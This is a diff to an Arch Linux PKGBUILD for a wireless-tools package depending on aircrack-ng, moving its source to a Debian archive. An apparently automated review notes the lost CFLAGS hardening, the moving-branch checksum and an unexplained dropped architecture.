-sha512sums=('a7879e832a7184f85b9b4f591fddb313731a8d8899c98ca3a1f026284bec79018d4ae373d5fd9cc1935915ad848761dc5f865aeca38ca4e13122e9c9f9108c3a') +depends=('glibc' 'aircrack-ng') +source=(https://salsa.debian.org/pkg-security-team/${pkgname}/-/archive/debian/master/${pkgname}-debian-master.tar.bz2) +sha512sums=('79dff994816e78ae1001074f93f266ad7b820cf03c0b2c3e61d9eb73e2a047c9bb912bcfb14f6dec09584c017407bd84fea127a11cc355b5f8a77102ef0ded89') prepare() { - cd "$pkgname-$pkgver" - - sed "s|-g -O3|${CFLAGS}|g" -i Makefile + cd ${pkgname}-debian-master sed 's|sbin|bin|g' -i Makefile } -build() { - cd "$pkgname-$pkgver" +build() { + cd ${pkgname}-debian-master make -C osdep make } package() { - cd "$pkgname-$pkgver" - - make DESTDIR="$pkgdir" PREFIX="/usr" install - - install -Dm 644 docs/*.html -t "$pkgdir/usr/share/doc/$pkgname" + cd ${pkgname}-debian-master + make DESTDIR="${pkgdir}" PREFIX="/usr" install + install -Dm 644 docs/*.html -t "${pkgdir}/usr/share/doc/${pkgname}" } +# vim: ts=2 sw=2 et:
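Review bot: prepare() drops the `sed "s|-g -O3|${CFLAGS}|g" -i Makefile` line, so the build no longer receives the packager's CFLAGS; if the Debian Makefile still hard-codes `-g -O3` as the old one did, the binary loses whatever hardening flags makepkg.conf supplies (stack protector, FORTIFY, PIE-related options). Keep that substitution next to the surviving `sed 's|sbin|bin|g' -i Makefile`, or pass `CFLAGS="$CFLAGS"` to both make invocations in build(). The new source URL fetches an archive of the moving `debian/master` branch rather than a tag, so the pinned sha512sum will stop matching as soon as that branch advances, and `pkgver=v6` no longer describes what is packaged; pointing the archive at a fixed tag or commit (`.../archive/<tag-or-commit>/...`) would keep checksum and version stable. `arch` also silently drops aarch64, which may be intended but is not explained by the change.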